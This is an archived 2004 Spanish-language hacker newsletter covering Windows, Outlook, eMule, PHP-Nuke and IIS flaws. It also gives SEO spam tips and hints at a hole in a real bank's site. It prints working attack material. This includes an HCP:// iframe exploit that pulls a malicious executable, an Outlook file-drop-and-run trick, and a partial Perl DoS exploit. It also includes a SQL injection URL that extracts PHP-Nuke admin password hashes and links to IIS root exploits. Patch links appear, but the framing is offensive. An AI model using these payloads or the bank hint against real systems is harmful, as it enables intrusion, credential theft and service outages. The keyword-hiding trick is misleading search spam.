|
Mostrando mensaje 164
|
|
< Anterior | Siguiente >
|
|
|
| Asunto: | [NewsLCU] Worms, Sasser, Outlook, Bullshittin' google, emuleDoS, etc... | | Fecha: | Miercoles, 12 de Mayo, 2004 23:35:33 (-0300) | | Autor: | CyV | lcu.com.ar <info @.......ar>
|
====================================
News Under - by La Covacha Underground
====================================
5277 Members - Buenos Aires, Argentina
====================================
HTTP://www.LCU.com.ar - 12/05/04
====================================
1] If {bug} exist then create.worm
2] LSASS.exe @ Win2k&XP: La falla + Worm + Exploit + Cura
3] My lonely vulnerable MS Outlook.
4] Bullshit @ G00gle - Metodos cuax0r
5] Bug @ "Centro de ayuda y soporte tecnico" Win XP/2k3
6] eMule 0.42e Remote DoS Exploit
7] PHP-Nuke 6.x - 7.2 - 3 bugs
8] Gettin' r00t @ ISS in 5 secconds
9] C00l SiteS
10] Algun tip[in] & final
====================================
--------------------------------
1] If {bug} exist then create.worm
--------------------------------
Ya paso con Remote Procedure Call, se descubrio la vulnerabilidad el
18/07/03 y el 11/08/03 el gusano Blaster ya estaba causando estragos en el
mundo.
"Si no aprendes la primera, aprenderas la segunda" acoto un pibe aleman de
18 años....
El 14/04/04 diose a conocer una falla en el Local Security Authority Service
[proceso lsass.exe], ya el 1/05/04 el worm Sasser owneaba y se multiplicaba
por la net, codeado por este chico, quien alego "lo desarrolle para que mi
madre, que realiza mantenimiento de pcs, tuviera mas clientes" [lol]
Ya es regla, a toda falla, basada en M$; (por ende, masiva), explotable,
veras a continuacion el coctel; worm + backdoor + exploit + rompe_egos.
--------------------------------
2] LSASS.exe @ Win2k&XP: La falla + Worm + Exploit + Cura
--------------------------------
Bueno, no nos vamos a poner a explicar la vulnerabilidad entera, para eso ya
hay varios sitios... [0] basicamente, lsass.exe es un proceso que se da por
default en los win2k y winxp, maneja los mecanismos de seguridad en los SO
anteriores, digamos que verifica la validez de un login contra una pc
cliente o servidor.
Alli se produce un buffer overflow, sencilla y precariamente
sintetizado/explicado seria; lsass.exe llama a lsasrv.dll, quien escribe en
un archivo de log debugueando lo que ocurre en el proceso, este log se
encuentra en el directorio '%windowsdir/debug'. Para realizar dicha accion
utiliza una funcion llamada vsprintf(), la cual no chequea los parametros
que se le den, entonces, podemos pasar una cadena mas grande que la que
deberia soportar, provocando una sobrecarga en la pila (buffer overflow) y
permitiendonos escribir codigo arbitrario.
Bien, como uno se da cuenta que el worm esta consigo? Mucho trafico de datos
en los puertos 445, 5554 y 9996.
Comenzamos a defendernos un poquito? La maquina se apaga repentinamente,
entonces para evitarlo vamos a inicio/cmd/shutdown -a. Luego vamos a
inicio/ejecutar/regedit buscamos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run y
deleteamos (borramos) el valor "avserve.exe" = C:\WINDOWS\avserve.exe.
Reiniciar el sistema. Ahora el worm ya no se estara ejecutando (pero
seguimos siendo vulnerables a que vuelva a infectarnos...) vamos al site de
ms y nos bajamos el parchete correspondiente [1].
[0] http://www.google.com.ar/search?q=lsass+buffer+overflow
[0.1] http://www.google.com.ar/search?q=sasser+worm
[0.2] http://www.lcu.com.ar/sasser
[1] http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
:: notas ::
a- Que no tengas el worm no implica que no lo vayas a tener.
b- Por ende es recomendable bajar el parche si aun no lo haz hecho.
c- Todos los Windows 2000 y Windows XP son vulnerables a esta falla.
:: paradoja :: Sasser explota Windows. Rob explota Sasser.
a- Sasser tambien abre un servicio ftp en el puerto 5554, desde donde va a
copiarse a si mismo via tcp 445 de la maquina siguiente.
b- Pero este servicio ftp es pedorro [despues de todo, no hace falta
seguridad en el, cierto?] y explotable...[2] que nos da una shell! =)
[2] http://www.securiteam.com/exploits/5AP0J0ACUM.html
> Mas links
- Tool by eEye (Retina) para scannear maquinas infectadas con dicho worm.
http://www.eeye.com/html/Research/Tools/Sasser.html
--------------------------------
3] My lonely vulnerable MS Outlook
--------------------------------
Una falla descubierta ayer, permite guardar temporalmente un archivo, y ser
ejecutado.
Como seria el tema?
Bueno, es asi, supongamos que enviamos a una cuenta de email, un mensaje,
cuyo codigo html posea un tag como el siguiente:
<img src="xpl0it.htm" style="display:none"> y el archivo xpl0it.htm adjunto.
Cuando el usuario [victima] responda el mensaje, se copiara el contenido del
archivo al directorio C:\Documents and Settings\<user name>\Local
Settings\Temp\xpl0it.htm
Me siguen? Ahora, ustedes diran.. "ah joya, y.. que hago con eso?" bueno,
ppl.. lograron meter en el hd de la maquina objetivo un archivo (dije mucho,
no?) supongamos que dirigimos al usuario [victima] a una direccion del tipo;
<a href="shell:user profile\\local
settings\\temp\\xpl0it.htm">http://www.lcu.com.ar/<;/a> ....
ya esta....
Ahora, como solucionarlo?
Seteen en herramientas/opciones/leer/"leer todos los correos como texto sin
formato".
o bien, usen 'The Bat' [3], aunque tambien tiene un par de fallas....[4]
[3] http://www.ritlabs.com/en/products/thebat/
[4] http://www.net-security.org/vuln.php?id=3023
--------------------------------
4] Bullshit @ G00gle - Metodos cuax0r
--------------------------------
Es lamentable ver la cantidad de sitios que no contienen determinado
contenido, y por querer hacer unos fuckin' euros [via diallers] meten
keywords a mas no poder...[y el sitio no refleja dicho contenido.. porque en
ultima instancia, si asi fuera, estaria tudo bom].
a- Pero mas patetico que eso, es ver como se "venden" scripts en php, asp,
javascript, que hacen el trabajo por si solo, y son de tan solo un par de
lineas.
No es mas que esto:
<?php
if ($link == "sexo")
{
echo include("keywords1.htm");
}
elseif ($link == "software")
{
echo include("keywords2.htm");
}
elseif ($link == "msn")
{
echo include("keywords3.htm");
}
elseif ($link == "emule")
{
echo include("keywords4.htm");
}
elseif ($link == "tujavie")
{
echo include("keywords5.htm");
}
else
{
echo "cuac";
}
;?>
Lo demas, queda en base a tus conocimientos y ganas de aplicarte.
Si no se entiende, pegate una vuelta por algunos sites relativos a
programacion en php.
[5] http://www.php.net
[5.1] http://www.hotscripts.com
b- Voy a tirarles algunos "HOT TIPS"... MUY hots.. todos testeados, todos
funcionan, vas a necesitar cierto proceso mental para llegar a la idea,
aplicate una mayeutica en base a....
b0.- Google no distingue ".", es lo mismo "hola" que "ho.la"
b1.- Google no distingue "-", es lo mismo "hola" que "h-o-l-a".
b2.- Google setea la posicion de una pagina en base a;
:: nota :: Palabra buscada = "cuac"
b2.1- PR
b2.2- "cuac" en nombre de dominio [combo con b0&b1]
b2.3- "cuac" en titulo
b2.4- "cuac" en documento html, asp, php, txt, etc.
b2.5- "cuac" en otros sites que linkean como; <a
href=http://www.lcu.com.ar>;cuac</a>
Tip @ b2.4:
<div style="VISIBILITY: hidden; T0P: 0px">
key1 key2 key3 etc</div>
De esa forma google toma las keys del site pero no apareceran visibles :-)
Hay mas.. bastante mas... como metodos para subir el PR a X (1=<x=<10)...
--------------------------------
5] Bug @ "Centro de ayuda y soporte tecnico" Win XP/2k3
--------------------------------
"Centro de ayuda y soporte tecnico" (HSC= "Help and Support Center" ) es
una característica del Windows para ofrecer ayudas al usuario. Se puede
acceder a l emediante URL's del tipo HCP:// .
Mediante una URL especialmente creada un atacante puede hacer que el usuario
local ejecute el helpctr.exe en el contexto de seguridad local e inyectarle
una URL en la aplicación.
- Exploit:
<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=site_maligno/sup3rh4x0rtr0ya
n0rmaldit0r.exe" width="1" height="1">
</iframe>
- Parche
http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx
--------------------------------
6] eMule 0.42e Remote DoS Exploit
--------------------------------
#!/usr/bin/perl
system("cls");
# Emule 0.42e Remote Denial Of Service Exploit
# Coded by Rafel Ivgi, The-Insider
# usage: perl emule042e.pl <host> <port> <how many times>
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $times = $ARGV[2];
if ($host)
{
unless($port) { $port="4711";}
unless($times) { $times="50";}
[Full Exploit @ http://www.k-otik.com/exploits/05102004.emule042e.pl.php ]
--------------------------------
7] PHP-Nuke 6.x - 7.2 - 3 bugs
--------------------------------
- Path Disclousure
http://server/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar
- XSS (Cross Site Scripting)
http://server/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss
code here]
http://server/modules.php?name=Downloads&d_op=viewsdownload&sid=[xss code
here]
- SQL Injection
http://server/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/
**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/
FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
--------------------------------
8] Gettin' r00t @ ISS in 5 secconds
--------------------------------
Esta vulnerabilidad, tiene que ver con un fallo en SSL.
- Parche
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
- Exploit
http://62.22.9.163/banners/G777-IIS-SSL.RAR [Exploit + Scanner]
http://www.k-otik.com/exploits/04212004.THCIISSLame.c.php
- Mas info
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=%20CAN-2004-0120
--------------------------------
9] C00l SiteS
--------------------------------
[web hosting] http://www.aeolushosting.com.ar
[capacitacion] http://www.macrocenter.com.ar/seguridad.asp
[bitorrent] http://icetorrents.no-ip.com
[porn] http://www.laminadehoy.com.ar
[sec_manual] http://www.eumed.net/cursecon/ecoinet/seguridad/index.htm
[c0des] http://www.zend.com
--------------------------------
10] Algun tip[in] & final
--------------------------------
- En winxp:
inicio/ejecutar/cmd/netstat -o
Nos da conexiones activas y su respectivo "PID" (Process ID).
Luego hacemos ctrl+alt+supr, vamos a "Procesos" > "Ver" > "Seleccionar
Columnas" > "Identificador de Proceso (PID)".
De esta manera podremos identificar la conexion, y el programa que se esta
ejecutando relativa a ella.
- BBVA
Seguridad CERO @ Banco Frances.
Patetico. Lamentable. Increible.
[c]"centro" es una variable.............................yyyy.. si en vez de
local.... el file es de un tercer site, y lo pasamos a hex?...
http://www.bbva.com.ar/bf/bbvafrm.html?centro=bi_01.htm&id1=3&id2=4
Alto peligro.
Eso, sumado a un XSS [x]... bueno, creo que.....esta todo dicho...
[c] by Cyervo
[x] by Xyborg
- Want mp3?
http://www.google.com.ar/search?q=%22Index+of+%2Fmp3%22
http://www.slsknet.org/ [el mejor para bajar full sets de punchi punchi]
- Pagara DeRemate ?
Lanzo de nuevo su sitio de afiliados, la vez anterior dejo a muchisimas
personas sin pagar... veremos que sucede.
http://www.afiliadosderemate.com.ar
- Lynx Rueda! Esta foto la saque en Miami, Fl, USA: [juro que es real!]
http://www.cyv.org.ar/pics/albums/userpics/miami/normal_p1190096.jpg
- Well...
Si queres publicar los boletines de LCU en tu sitio, no hay drama, si queres
hacer un cambio de links con lcu, tampoco hay problema...[powered by alf]
info arroba lcu.com.ar
CyV [Cyervo]
HTTP://www.lcu.com.ar [Aca ta la covacha!]
msn: info arroba cyv.org.ar
Mi IP; 127.0.0.1
La IP del Oraculo; 216.239.51.104
La IP del Bien; 198.182.196.56
La IP del Mal; 207.46.250.252
La IP de tu vieja; 69.69.69.69
La IP Vulnerable; 69.10.155.52
_______________________________________________________________________
Visita nuestro patrocinador:
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
!! LLUVIA DE MILLONES EN LA PEÑA DE PRIMITIVA !!
El pasado miércoles 7 de Abril, 50 de nuestros abonados de
PrimiSistema100, se repartieron el MAXIMO PREMIO DE LA BONOLOTO.
Hasta ahora, nuestra Peña de Primitiva ha repartido un total de
!!! 2,430,555 Euros !!!
Apúntese ahora y cace los millones. Visítenos sin compromiso.
Haz clic aqui -> http://elistas.net/ml/141/
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
|
Responder a este mensaje